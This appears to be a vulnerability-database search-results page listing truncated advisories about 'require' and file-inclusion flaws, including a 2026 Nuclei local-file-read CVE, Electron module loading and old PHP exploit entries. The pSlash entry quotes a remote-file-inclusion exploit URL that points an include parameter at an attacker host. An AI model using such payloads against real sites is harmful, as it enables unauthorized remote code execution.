Lucene search

20 matches found

RedhatCVE
added 2026/05/18 12:44 p.m. | 9 views

CVE-2026-41646

A flaw was found in Nuclei. A vulnerability in Nuclei's JavaScript protocol runtime allows JavaScript templates to read local .js and .json files. This can be exploited by an attacker through the require function, bypassing default local file access restrictions, leading to information disclosure...

5.5 CVSS | 5.7 AI score | 0.00012 EPSS
Exploits: 0 | References: 2
NVD
added 2026/05/08 4:16 a.m. | 5 views

CVE-2026-41646

Nuclei is a vulnerability scanner built on a simple YAML-based DSL. From version 3.0.0 to before version 3.8.0, a vulnerability in Nuclei's JavaScript protocol runtime allows JavaScript templates to read local .js and .json files through the require function, bypassing the default local file acce...

5.5 CVSS | 0.00012 EPSS
Exploits: 0 | References: 3
ATTACKERKB
added 2026/05/08 3:14 a.m. | 3 views

CVE-2026-41646

Nuclei is a vulnerability scanner built on a simple YAML-based DSL. From version 3.0.0 to before version 3.8.0, a vulnerability in Nuclei's JavaScript protocol runtime allows JavaScript templates to read local .js and .json files through the require function, bypassing the default local file acce...

5.5 CVSS | 5.7 AI score | 0.00012 EPSS
Exploits: 0 | References: 4 | Affected Software: 1
Github Security Blog
added 2026/04/22 7:58 p.m. | 17 views

Nuclei: Local File Read via require() Module Loader Bypass

A vulnerability in Nuclei's JavaScript protocol runtime allows JavaScript templates to read local .js and .json files through the require function, bypassing the default local file access restriction. Affected Component: The issue is in the JavaScript runtime's module loading system. The goja...

5.5 CVSS | 6 AI score | 0.00012 EPSS
Exploits: 0 | References: 5 | Affected Software: 1
Github Security Blog
added 2025/10/10 11:46 p.m. | 9 views

Happy DOM: VM Context Escape can lead to Remote Code Execution

Escape of VM Context gives access to process level functionality. Summary: Happy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks. A Node.js VM Context is not an isolated environment, and if the user runs untrusted...

7.2 CVSS | 7.5 AI score | 0.00581 EPSS
Exploits: 0 | References: 6 | Affected Software: 1
Code423n4
added 2023/08/07 12:0 a.m. | 8 views

[M-02] Denial of Service on failed call Dos

Lines of code Vulnerability details Impact Detailed description of the impact of this finding. External calls can fail accidentally or deliberately, which can cause a DoS condition in the contract. To minimize the damage caused by such failures, it is better to isolate each external call into its...

7 AI score
Exploits: 0
Veracode
added 2022/09/27 5:56 a.m. | 28 views

Prototype Pollution

express-xss-sanitizer is vulnerable to prototype pollution. The vulnerability exists in the require function of sanitize.js because it doesn't properly sanitize the user input data, which allows an attacker to inject and execute arbitrary JavaScript...

7.3 CVSS | 6.5 AI score | 0.00504 EPSS
Exploits: 1 | References: 4 | Affected Software: 1
Veracode
added 2019/09/04 5:28 a.m. | 10 views

Local File Inclusion

larvitbase-www is vulnerable to local file inclusion. The package uses an exposed API endpoint that accepts an unvalidated GET parameter to a require function call. This could potentially allow a remote attacker to execute any .js files within the web server. Successful exploitation causes the...

4.1 AI score
Exploits: 0
CNVD
added 2019/03/20 12:0 a.m. | 1 views

libssh2 out-of-bounds read vulnerability (CNVD-2019-07803)

libssh2 is a client-side C library that implements the SSH2 protocol, which is capable of executing remote commands, file transfers, and providing a secure transmission channel for remote programs. The '_libssh2_packet_require' and '_libssh2_packet_requirev' functions in libssh2 have an out-of-bounds...

9.1 CVSS | 9.2 AI score | 0.01176 EPSS
Exploits: 0 | References: 1
Japan Vulnerability Notes
added 2016/04/22 4:49 a.m. | 1 views

Electron may insecurely load Node modules

Overview: Electron fails to restrict the path for loading Node modules, which may lead to execution of arbitrary JavaScript. Electron is a software framework for developing cross-platform desktop applications with web technologies, such as HTML, CSS, JavaScript with Chromium and Node.js. Electron...

7.8 CVSS | 6.9 AI score | 0.00057 EPSS
Exploits: 0 | References: 7
Japan Vulnerability Notes
added 2016/04/22 12:0 a.m. | 29 views

JVN#00324715: Electron may insecurely load Node modules

Electron is a software framework for developing cross-platform desktop applications with web technologies, such as HTML, CSS, JavaScript with Chromium and Node.js. Electron is used in applications such as Atom editor, Microsoft Visual Studio Code, etc. Electron contains a flaw where the search...

7.8 CVSS | 7.5 AI score | 0.00057 EPSS
Exploits: 0
myhack58
added 2014/03/15 12:0 a.m. | 10 views

PHP file include vulnerability analysis-vulnerability warning-the black bar safety net

1. What is a "remote file inclusion vulnerability"? The answer: the server uses a PHP function to include arbitrary files, and because the source of the file to be included is not strictly filtered, a malicious file can be included, and we can construct the malicious file to...

7.4 AI score
Exploits: 0
myhack58
added 2013/04/17 12:0 a.m. | 47 views

PHP file include vulnerability details(including the truncated method)-vulnerability warning-the black bar safety net

1. What is a "remote file inclusion vulnerability"? The answer: the server uses a PHP function to include arbitrary files, and because the source of the file to be included is not strictly filtered, a malicious file can be included, and we can construct the malicious file to...

7.4 AI score
Exploits: 0
myhack58
added 2012/09/30 12:0 a.m. | 10 views

php execution vulnerability parsing-vulnerability warning-the black bar safety net

1. Code execution functions: PHP functions that can execute code, such as eval, assert, ``, system, exec, shell_exec, passthru, escapeshellcmd, pcntl_exec, etc. Demo code 1.1: <?php echo dir; ?> 2. File inclusion code injection: The file containing...

0.1 AI score
Exploits: 0
myhack58
added 2011/04/26 12:0 a.m. | 23 views

PHP code execution vulnerability references summary-vulnerability warning-the black bar safety net

1. Code execution functions: PHP functions that can execute code, such as eval, assert, ``, system, exec, shell_exec, passthru, escapeshellcmd, pcntl_exec, etc. Demo code 1.1: 2. File inclusion code injection: The file containing the function in the specific...

Exploits: 0
Packet Storm
added 2009/05/08 12:0 a.m. | 13 views

TinyWebGallery 1.7.6 Local File Inclusion

?php / ----------------------------------------------------------- TinyWebGallery = 1.7.6 LFI / Remote Code Execution Exploit ----------------------------------------------------------- author...: EgiX mail.....: n0b0d13satgmaildotcom link.....: http://www.tinywebgallery.com/ details..: this...

7.4 AI score
Exploits: 0
0day.today
added 2009/04/06 12:0 a.m. | 35 views

iDB 0.2.5pa SVN 243 (skin) Local File Inclusion Exploit

Exploit for unknown platform in category web applications ======================================================= iDB 0.2.5pa SVN 243 skin Local File Inclusion Exploit ======================================================= !/usr/bin/env LOTFREE 2009 - lotfree.next-touch.com Local require...

7.1 AI score
Exploits: 0
Exploit DB
added 2006/08/23 12:0 a.m. | 55 views

pSlash 0.7 - 'lvc_include_dir' Remote File Inclusion

pSlash v0.7 lvcincludedir Remote Include Vulnerability Author: XORON Class: Remote cont@ct: x0r0nathotmaildotcom Code: require$lvcincludedir.'db/dbmysql.inc.php'; Exploit: http://www.site.com/path/modules/visitors2/include/config.inc.php?lvcincludedir=http://evilscripts? Greetz: str0ke, Ironfist,...

7.4 AI score
Exploits: 0
Tenable Nessus
added 2006/04/16 12:0 a.m. | 24 views

PAJAX < 0.5.2 Multiple Vulnerabilities

The remote host is running PAJAX, a PHP library for remote asynchronous objects in JavaScript. The version of PAJAX installed on the remote host fails to validate input to the 'pajax/pajaxcalldispatcher.php' script before using it in a PHP 'eval' function. An unauthenticated attacker can exploit...

7.5 CVSS | 6 AI score | 0.72147 EPSS
Exploits: 5 | References: 4
Prion
added 2006/01/21 12:3 a.m. | 13 views

Design/Logic Flaw

TYPO3 3.7.1 allows remote attackers to obtain sensitive information via a direct request to (1) thumbs.php, (2) showpic.php, or (3) tables.php, which causes them to incorrectly define a variable and reveal the path in an error message when a require function call fails...

5 CVSS | 6.7 AI score | 0.01903 EPSS
Exploits: 1 | References: 11 | Affected Software: 1